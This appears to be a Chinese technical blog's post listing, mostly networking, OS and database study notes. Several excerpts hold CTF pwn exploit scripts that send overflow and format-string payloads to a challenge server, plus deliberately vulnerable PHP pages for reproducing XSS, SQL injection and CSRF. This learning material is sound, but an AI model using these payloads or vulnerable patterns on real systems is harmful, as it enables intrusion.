- 博客(81)
- 收藏
- 关注
RSS订阅原创 双向转发检测BFD与网络质量分析NQA
主要用于快速检测、监控网络中链路或者ip路由的转发连通状况,可以跨设备多跳配置。原理:通过在两台网络设备上建立会话,用来实时检测这两个网络设备之间的双向转发路径,并在其路径上周期性发送BFD控制报文,用来检测路径是否可以正常使用。BFD为上层应用服务,BFD本身没有邻居发现机制,而是靠被服务的上层应用通知其邻居信息以建立会话。BFD提供异步检测模式,设备之间相互周期性的发送BFD控制报文,如果某个设备连续几个报文都没有接到,就认为BFD会话的状态是down。
2025-04-14 14:48:29
137
原创 华为路由策略
路由策略是通过影响路由协议进而影响路由表,来控制流量的方向,主要实现了路由过滤和路由属性设置等功能,它通过更改路由属性(包括可达性)来改变网络流量所经过的路径。1、定义规则:定义将要实施路由策略的路由信息的特征,即定义一组匹配规则,可以用路由信息中的不同属性作为匹配依据进行设置,如目的地址、发布路由信息的设备地址等。目的:设备在发布、接收 和引入路由信息时,根据实际组网需要实施一些策略,以便对路由信息进行过滤和改变路由信息的属性。2、应用规则:将匹配规则应用于路由的发布、接受和引入等过程的路由策略中。
2025-04-02 22:29:09
360
原创 华为单臂路由 与 策略路由
概念:如图大纲LSW1是二层交换机不具备三层路由功能,并且连接着不同的vlan,并使每个vlan都可以与外网通信,那么就要用单臂路由技术,原理是将图中的AR1的ge0/0/0接口逻辑上分为多个子接口,分别对应不同的vlan的网关。AR1配置效果:从pc1中tracert 192.168.2.2。
2025-03-27 22:31:24
455
原创 华为交换相关
(1)access:只能属于单个VLAN,一般用于连接计算机端口(2)trunk:端口允许多个VLAN通过,可以接收和发送多个VLAN报文,默认情况下只有管理VLAN不携带标签信息(3)Hybrid:华为独有的一个接口类型,允许多个VLAN通过,但与trunk不同的是它可以允许转发多个VLAN时不打标签打上缺省的vlan id,当缺省vlan id在允许通过的列表中,接收该报文。打上缺省vlan id,当缺省vlan id不在允许通过的列表中时,丢弃该报文。
2025-03-24 16:52:51
751
原创 计算机硬件基础
程序计数器pc:指向下一条指令的地址指令寄存器IR:保存当前正在执行的指令地址寄存器AR:用于存放CPU当前访问的内存单元的地址数据寄存器DR:用于暂存从内存储器中读出或写入的指令或数据指令译码器:用于对获取的指令进行译码。
2025-03-23 20:34:49
225
原创 攻防世界pwn高手进阶区 exp
dice_gamefrom pwn import *from ctypes import *lo = remote('220.249.52.133',45069)#lo = process('./dice_game')lib = cdll.LoadLibrary("libc.so.6")lib.srand(1) #定义种子的值为1#for i in range(50):# num = lib.rand()%6 + 1# print numpayload = 'a'*(0x50-0
2020-09-12 19:55:52
794
原创 pwn 程序保护
printf("%d", a) ,参数 a 在堆栈中的是 a 的地址,printf("%d",a)堆栈的结构结合此题的堆栈的数据顺序格式化字符串漏洞:正常情况下printf("%s", a) 是输出a的值,但是如果直接使用 printf(a),虽然也可以输出a的值,但如果a中含有%x等格式化字符时,变会出现泄漏内存的情况我们便在参数区输入 pwnme 的地址,利用%n 来更改其数值。 %n - 到目前为止所写的字符数构造如下的 payloadp32(pwnme_addr) +..
2020-09-12 16:43:51
651
原创 攻防世界pwn新手区 exp
level0from pwn import * r = remote("220.249.52.133", 57278)payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596)r.recvuntil("Hello, World\n")r.sendline(payload)r.interactive()CGfsbfrom pwn import *xl = remote('220.249.52.133',43908)pwnname_addr
2020-09-11 21:31:01
640
原创 汇编基础之常用指令,寄存器
寄存器(32位): 通用寄存器(8个):EAX、EBX、ECX、EDX、ESI、EDI、EBP、ESP 其中 ECX 为计数寄存器 其中 ESP 为栈顶指针寄存器 其中 EBP 栈底指针寄存器 其中 ESI、EDI用于movs (把A复制到B) ESI 存放所复制数据的堆栈地址 A的地址 EDI 存放所复制数据的目的堆栈地址 B的地址 CPU下一次执行地址寄存器 EIP 堆栈:是程序所申请使用的内存空间,指令...
2020-09-04 22:24:58
725
原创 xxe漏洞
xxe漏洞,全称xml外部实体注入漏洞,xxe漏洞发生在应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害XML 指可扩展标记语言(eXtensible Markup Language),是对html的补充XML 被设计用来传输和存储数据。DTD(文档类型定义)的作用是定义 XML 文档的合...
2020-04-19 16:33:18
288
原创 ssrf漏洞复现(附源码)
SSRF服务器请求伪造,是攻击者构造攻击链给服务器,服务器执行并发送请求造成安全问题的漏洞,一般用于在外网探测、攻击内网服务
2020-04-16 20:46:23
1433
原创 文件包含漏洞复现(附源码)
文件包含是指使用include、require等一些包含文件的函数,所产生的漏洞。分为本地文件包含、远程文件包含本地文件包含:是调用的是服务器本地的文件:如下:远程文件包含:是调用其他服务器的文件:如下:下面开始复现:<!DOCTYPE html><html><head> <title>index.php</ti...
2020-04-15 21:46:24
1430
原创 csrf漏洞复现(附源码)
csrf全称跨站请求伪造,攻击者盗用受害者用户的身份,以受害者的身份发送恶意请求下面进行复现,(本人前端、后端小白,代码有些不规范,大佬们见谅)这里我创建了三个文件login.php是用户的登入页面main.php是商品购买页面sqlcon.php存放操作数据库的各个函数。源码如下:以下代码不只存在csrf漏洞,还存在SQL盲注 有兴趣的可以注一下lo...
2020-04-14 23:11:24
1624
原创 DOM型xss复现(无过滤附源码)
<html> <head> <title> DOM-XSS</title> </head> <body> <script> function shuru(){ var oBox=document.get...
2020-04-12 21:58:13
2114
原创 存储型xss复现(无过滤附源码)
<html><head><script> function setCookie() { document.cookie = 'dsfasdfsad'; //用于测试随便设的 } setCookie()</script></head><body><form action="cunchuxss....
2020-04-12 13:37:40
523
原创 反射型xss漏洞复现(无过滤,附源码)
<html><head><script> function setCookie() { document.cookie = 'dsfasdfsad'; //用于测试随便设的 } setCookie()</script></head><body><form action="xss.php" m...
2020-04-11 20:58:44
951
原创 sql注入之万能密码漏洞复现(附源码)
<html><head><meta charset="utf-8"><title>sql注入靶机</title></head><body><form action="sql.php" method="GET">username:<input type="text" name="u...
2020-04-11 18:45:00
2089
原创 php连接并查询数据库
<html><head><meta charset="utf-8"><title>sql注入靶机</title></head><body><form action="sql.php" method="GET">username:<input type="text" name="u...
2020-04-11 15:16:04
1040
转载 python3之requests
1、requsest的请求所有请求的功能可通过这7种方法访问,他们都返回response对象的一个实例。(1)requests.request(method,url,**kwargs):构造并发送一个request,返回一个response对象参数:method: request对象的方法(POST) url: request对象的URL params:可选的,要在查询字符串中...
2020-03-30 13:49:51
734
原创 sprintf函数字符串逃逸漏洞
在php的sprintf函数中 %后的一个字符(除了’%’)会被当作字符类型,像%s(代表字符串)、%b( 代表二进制数)单引号’,斜杠\也也会被当做字符类型。php源码中只对15种类型做了匹配,其他的字符php未做任何处理,直接跳过,所以导致了这个问题:没做字符类型检测的最大危害就是它可以吃掉一个转义符\, 如果%后面出现一个\,那么php会把\当作一个格式化字符的类型而吃掉\, ...
2020-03-25 22:58:26
541
原创 pyhon网络编程使用tcp发送/接收数据
tcp客户端发送/接收数据流程: 1、创建套接字 2、绑定本地端口(客户端也就可以不绑定,不绑定时系统随机开启一个端口) 3、连接服务器地址 4、发送或接收服务器数据 5、关闭套接字tcp发送数据实例:import socket# 定义服务器连接函数def tcpclient_to_sever(tcp_soctet): addr = input...
2019-12-25 16:55:56
545
原创 python网络编程 udp数据接收与发送
udp网络通信流程: 1、创建套接字 2、绑定端口(接收端必须绑定端口(否则每次通信都要向接收端询问端口号),发送端可不绑定端口;当不绑定端口时,操作系统将随机开启一个端口) 3、发送/接收数据 4、关闭套接字使用udp传输协议发送信息import socketdef main(): # 创建udp套接字...
2019-12-20 23:39:30
863
原创 虚拟内存储器
虚拟存储器管理: 实存管理需要将作业一次性全部装入内存,作业的大小收到内存的限制。解决方法有两种: 1、增加主存, 2、逻辑上扩充内存,即虚拟内存。 程序的局部性特性: 时间局部性:指程序中的某条指令一旦被执行,则在较短的时间内,该条指令可能被在执行 空间局部性:指一旦程序访问了某个存储单元,在较短的时间内,其附近的存...
2019-10-14 14:32:48
259
原创 内存储器
存储器主存管理的主要功能: 1、主存的分配和回收 2、地址转换和重定位 3、存储保护和主存共享 4、存储器扩充覆盖:由应用程序覆盖,在内存中将新的程序代码覆盖旧的程序代码 实现:使用函数库(操作系统不知覆盖),或操作系统支持交换:由OS控制,将暂时不用执行的程序放入外存中。虚拟存储的请求调入和预调入,内存的物理组织 1、物理地址:把内存...
2019-10-14 14:32:08
1556
原创 信号量PV
信号量:在多个相互合作的进程之间使用相同的信号来同步,一个进程强制的被停止在一个特定的地方直到收到一个专门的信号,这个信号就是信号量信号量S的初值表示可用资源数:当S>0时,S的值表示还剩可用的资源数;当S<=0时表示已无资源可以分配,其绝对值表示此时在队列中等待分配资源的进程数Wait操作表示申请资源(也就是P操作),Signal操作表示释放资源(也就是V操作),除了初始化外只...
2019-10-14 14:30:08
2555
原创 互斥和同步
互斥和同步: 临界资源:每次只允许一个进程访问的共享资源。 临界段:进程中访问临界资源(共享变量)的代码段;访问同一临界资源的各临界段分散在各有关进程的程序中。 临界段设置原则: 互斥性:每次允许一个进程停留在临界段 有限逗留:进程只能在临界段内逗留有限时间 有限等待:进程不能无限期等待在临界段之外 前进性:临...
2019-10-14 14:28:49
162
原创 作业调度分类、调度算法
作业的调度:分类: 高级调度:就是作业调度,按照某种调度算法从后备作业队列中挑选作业分配主存和外设资源。并建立进程 中级调度:又称中程调度,为了提高内存利用率和系统吞吐量,将暂时不能运行的进程不再占用宝贵的内存资源,将他们调至外存上去等待,也就是挂起 低级调度:又称进程调度,按照某种原则将将处理器分配给就绪进程或线程三级调度:指同时出现以上三种调度方式的调度模型。调度...
2019-10-14 14:25:50
1859
原创 进程、线程相关
进程:进程是动态的,程序是静态的;程序是由序代码的集合;进程是程序的执行。通常进程不可在计算机之间迁移,而程序可以相互复制传递 通过多次执行,一个程序可以对应多个进程;通过调用关系,一个进程可以包括多个程序 进程的性质: 并行性、制约性、动态性、结构性、共享性、独立性 进程是系统中资源分配和保护的基本单位。 进程的状态:运行状态、就绪状态、...
2019-10-14 14:18:12
164
原创 操作系统的体系结构、与程序调用过程
管态:是指操作系统管理程序运行的状态,具有较高的特权级别(又称为特权态)目态:用户程序运行时的状态,较低的特权级别,又称为普通态、用户态。高特权级别对应的可运行指令集包含低特权级别的管态权限:可以执行全部指令(包括特权指令)、可使用所有资源、具有改变处理器状态的权限目态权限:只有非特权指令能执行系统调用过程: 1、当编程人员给定系统调用名和参数之后,由一个类似于硬件中断处...
2019-10-14 14:16:07
418
原创 操作系统的分类
操作系统的分类 批处理(batch processing )就是将作业按照它们的性质分组(或分批),然后再成组(或成批)地提交给计算机系统,由计算机自动完成后再输出结果,从而减少作业建立和结束过程中的时间浪费。根据在内存中允许存放的作业数,批处理系统又分为单道批处理系统和多道批处理系统。在该系统中,用户所提交的作业都先存放在外存上并排成一个队列,成为“后备队列”;然后,由作业调度程序按一定...
2019-10-14 14:13:02
735
原创 eigrp tunnel 联合建网
一个红圆圈是一个mgre距离矢量型路由协议时关闭水平分割,(关自动下一跳(可选))no ip split-horizon eigrp 1no ip next-hop-self eigrp 1使用来下层分支通过公网直接通信ip nhrp shortcut启动nhrp的最短路径查找 (不再做隧道口映射,查目标公网口的映射)ip nhrp redirect 启动nhrp的...
2019-10-14 14:10:07
2591
原创 mpls 实验
R1与R3之间使用ospf,R2与R3之间使用eigrp, R5与R6之间使用ospf,R5与R7之间使用静态,R5与R8之间使用bgp建立ebgp邻居关系R1pingR6R2pingR7R8pingR1、R2R1的路由表R2的路由表R6的路由表R7的路由表R8的路由表R1:interface Loopback0 ip...
2019-10-14 14:09:46
1433
原创 ipsec nat-t 与 vrf 穿越实验
要求:R1做vrf穿 越,R5访问通过R1,R2做,并且R1,R2可以主动的访问R5vrf穿越写两条静态地址映射使 R1,R2可以主动的访问R5R5pingR1、R4R4pingR1、R5R1pingR5、R4R1p vrf k rd 1:1crypto keyring k vrf k pre-shared-key addre...
2019-10-14 14:08:25
703
原创 ipsec 基础实验
R1环回1.1.1.1 R3环回3.3.3.3 R2为公网R1与R2的环回通过ipsec vpn 通信效果R1crypto isakmp policy 10 encr 3des authentication pre-share group 5crypto isakmp key 6 ccie address 23.0.0.1 !!cr...
2019-10-14 14:08:02
669
原创 ospf tunnel 联合建网
R1,R7,R8为公网R10pingR6环回R10tracerouteR6环回R2:crypto isakmp policy 10 encr 3des hash md5 authentication pre-share group 2crypto isakmp key 6 ccie address 0.0.0.0 0.0.0.0crypto ipsec t...
2019-09-03 11:46:49
469
原创 ipsec 详解
目录加密算法对称加密算法非对称加密算法DH算法RSA 公钥+私钥 (成对出现)IPsecIPSec VPN简介ipsec的工作模式IPsec通信协议1、AH协议(Authentication Header,认证报头)2、ESP协议IPSec vpn建立IKEIpsec数据传递图对于ipsec vpn 最重要的是安全安全 三要素 安...
2019-09-01 14:22:59
33924
4
原创 bugku login1(SKCTF)
打开网页后根据题目中的提示,这道题的所使用的是sql约束攻击。以下原理引用于https://www.freebuf.com/articles/web/124537.html首先了解一下SQL约束攻击原理,sql语句中的空格作为字符的结尾时,空格符会被修剪,也就是说'vampire'与'vampire ' 没有什么区别SELECT * FROM users WHER...
2019-08-22 00:26:14
631
原创 并发控制、事务、锁机制
并发控制、事务 事务是用户定义的一个数据库操作序列,这些操作要么全做要么全不做。 程序和事务的区别 事务是恢复和并发控制的基本单位 一个应用程序通常有多个事务组成 定义事务的两种方式 显式方式:事务开始由用户显示控制或DBMS自动隐含,事务结束由用户显示控制 隐式方式:当用户没有显示的定义事务时,由DBMS自动划分事务 事务的ACI...
2019-08-11 14:56:52
356
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人